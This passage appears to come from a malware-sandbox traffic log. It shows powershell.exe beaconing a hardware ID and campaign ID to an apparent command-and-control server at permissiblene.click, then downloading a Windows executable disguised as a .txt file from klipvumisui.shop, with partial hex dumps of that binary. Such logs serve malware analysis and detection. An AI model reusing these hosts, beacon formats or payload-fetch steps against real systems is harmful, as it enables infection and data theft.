                                                                                                      2024-12-31 08:26:28 UTC5450OUTData Raw: 2d 2d 46 50 4e 52 30 46 4a 4b 41 46 43 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 46 50 4e 52 30 46 4a 4b 41 46 43 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 50 4e 52 30 46 4a 4b 41 46 43 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 46 50 4e 52 30 46 4a 4b 41 46 43 50 52
                                                                                                      Data Ascii: --FPNR0FJKAFCPRContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--FPNR0FJKAFCPRContent-Disposition: form-data; name="pid"1--FPNR0FJKAFCPRContent-Disposition: form-data; name="lid"yJaNLj--re5--FPNR0FJKAFCPR
                                                                                                      2024-12-31 08:26:28 UTC1139INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=m78ufgjbkrnfg7qmof0keohage; expires=Sat, 26 Apr 2025 02:13:07 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2t7TYYbant2UCBy3uh9%2FUz8%2FXOv%2BFm2QEaikQu2s8FBKBzXe%2BoYopM2gD9bibct8o%2BmxXSWAv7yQenczJiYlnTCy1kvoH6Nl2q8Up6t3pLXvaq3igf%2BTEiiGpwJ9vvL%2BU3%2Fep%2BhW"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e286596643f8-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2024&rtt_var=775&sent=5&recv=10&lost=0&retrans=0&sent_bytes=2846&recv_bytes=6365&delivery_rate=1396461&cwnd=217&unsent_bytes=0&cid=7aeae3db60057dd8&ts=436&x=0"
                                                                                                      2024-12-31 08:26:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.549990188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:29 UTC283OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=DOFL1NC99H51R36QC
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1232
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:29 UTC1232OUTData Raw: 2d 2d 44 4f 46 4c 31 4e 43 39 39 48 35 31 52 33 36 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 44 4f 46 4c 31 4e 43 39 39 48 35 31 52 33 36 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 4f 46 4c 31 4e 43 39 39 48 35 31 52 33 36 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 44
                                                                                                      Data Ascii: --DOFL1NC99H51R36QCContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--DOFL1NC99H51R36QCContent-Disposition: form-data; name="pid"1--DOFL1NC99H51R36QCContent-Disposition: form-data; name="lid"yJaNLj--re5--D
                                                                                                      2024-12-31 08:26:29 UTC1122INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:29 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=qvclp2bq8hu2nlbvck0o35ami2; expires=Sat, 26 Apr 2025 02:13:08 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynFNyBRGvCJxUZmoGIY2XvJVMsUUyYb1PYEQuQxBG0cPegYqC0O542zpytcehzOUhqfIjxw2pLO6wkxY6jx3iyLaC6esLYu9MS%2Fw8fRIFRkMJuStNDT4DpIgAiengLPO1NOUeIOG"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e28c1fcc430e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1542&rtt_var=611&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2151&delivery_rate=1745367&cwnd=186&unsent_bytes=0&cid=db03fa3c93afe1a6&ts=438&x=0"
                                                                                                      2024-12-31 08:26:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.549991188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:30 UTC282OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=643076B20D50MOJP
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1092
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:30 UTC1092OUTData Raw: 2d 2d 36 34 33 30 37 36 42 32 30 44 35 30 4d 4f 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 36 34 33 30 37 36 42 32 30 44 35 30 4d 4f 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 34 33 30 37 36 42 32 30 44 35 30 4d 4f 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 35 0d 0a 2d 2d 36 34 33 30
                                                                                                      Data Ascii: --643076B20D50MOJPContent-Disposition: form-data; name="hwid"0BC2C7C2BD494941961F82810656F945--643076B20D50MOJPContent-Disposition: form-data; name="pid"1--643076B20D50MOJPContent-Disposition: form-data; name="lid"yJaNLj--re5--6430
                                                                                                      2024-12-31 08:26:30 UTC1126INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:30 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=vr684pl4lsj3dcac566qid0sum; expires=Sat, 26 Apr 2025 02:13:09 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdNEL3e0j%2B6YjNFnbzxz24M8dt9968FqDeqWhEPLgUrE18wof0g%2Be3w2ugZvgjcm5Ix3SHjFgUZoLQKIIOzJQRvxPeLH%2BpDEpJIXC7MGWTvloL757cx6AOkn8LgRlWQppU2akHwx"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e2923861447a-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1602&rtt_var=609&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2010&delivery_rate=1785932&cwnd=232&unsent_bytes=0&cid=8123bed6bd1f6427&ts=518&x=0"
                                                                                                      2024-12-31 08:26:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-31 08:26:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.549992188.114.96.34433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:31 UTC268OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 112
                                                                                                      Host: permissiblene.click
                                                                                                      2024-12-31 08:26:31 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 61 4e 4c 6a 2d 2d 72 65 35 26 6a 3d 34 61 62 63 65 31 34 36 39 61 30 38 36 37 65 33 61 31 39 61 62 63 65 37 31 34 36 34 63 34 37 33 26 68 77 69 64 3d 30 42 43 32 43 37 43 32 42 44 34 39 34 39 34 31 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35
                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=yJaNLj--re5&j=4abce1469a0867e3a19abce71464c473&hwid=0BC2C7C2BD494941961F82810656F945
                                                                                                      2024-12-31 08:26:31 UTC1128INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:31 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=54nnkk4oj4hagp68g14arp2n27; expires=Sat, 26 Apr 2025 02:13:10 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qL8RndJjWEc6a2LoctMtFr0j%2F2Z3rWpsqufs304lLUCKNrQOYLU9m7wQJZJSmA7ORW3Fp%2BMn30zgfVVr3R0Zy9XN64aDKNsYKzrRN5q4fHJq%2FhXzHJ%2BNH9bqTnb536L1V4Knepjb"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e298ab2342e9-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1656&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1016&delivery_rate=1717647&cwnd=240&unsent_bytes=0&cid=038bccff21e7e533&ts=460&x=0"
                                                                                                      2024-12-31 08:26:31 UTC138INData Raw: 38 34 0d 0a 5a 4b 69 62 45 43 46 55 2b 62 30 2b 65 57 4b 43 2b 72 5a 51 73 73 42 4d 7a 54 44 6d 53 34 5a 45 30 51 5a 43 51 2b 52 69 55 38 77 2f 30 37 6c 6c 41 32 37 62 31 55 6f 4e 45 76 48 41 36 6e 2f 75 37 79 65 68 57 5a 59 39 38 79 6d 34 64 54 63 71 79 68 45 37 6f 78 54 30 74 48 6c 50 49 4b 62 65 55 67 6b 39 38 5a 4c 58 66 73 61 34 4f 4f 38 63 78 43 33 79 5a 75 73 30 62 6d 47 42 51 47 6e 39 47 66 55 3d 0d 0a
                                                                                                      Data Ascii: 84ZKibECFU+b0+eWKC+rZQssBMzTDmS4ZE0QZCQ+RiU8w/07llA27b1UoNEvHA6n/u7yehWZY98ym4dTcqyhE7oxT0tHlPIKbeUgk98ZLXfsa4OO8cxC3yZus0bmGBQGn9GfU=
                                                                                                      2024-12-31 08:26:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.549993104.21.37.1284433836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-31 08:26:32 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Host: klipvumisui.shop
                                                                                                      2024-12-31 08:26:32 UTC897INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 31 Dec 2024 08:26:32 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 8767044
                                                                                                      Connection: close
                                                                                                      Accept-Ranges: bytes
                                                                                                      ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                      Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6tkpSXmuHAoh%2BJ1IePhNaVFmZuviu53UV1FWWtQYYk7SWbiKu0wmJrX25Bj0l9Uw5TUCBYmf9KssEjTtMLpMAzF9P7dVkpjPqY4YwDRS4jomp2GflxsEg9mRcJ4X64Py6Tv"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fa8e29e9b844244-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=820&delivery_rate=1829573&cwnd=221&unsent_bytes=0&cid=8a628037d5c70a75&ts=300&x=0"
                                                                                                      2024-12-31 08:26:32 UTC472INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 c2 0a
                                                                                                      Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74 61 02
                                                                                                      Data Ascii: SULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Data
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54 79 70
                                                                                                      Data Ascii: @MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassTyp
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81 40 00
                                                                                                      Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?@
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53 70 69
                                                                                                      Data Ascii: AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TSpi
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29 40 00
                                                                                                      Data Ascii: uction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)@
                                                                                                      2024-12-31 08:26:32 UTC1369INData Raw: 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00 80 2c
                                                                                                      Data Ascii: oolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString,
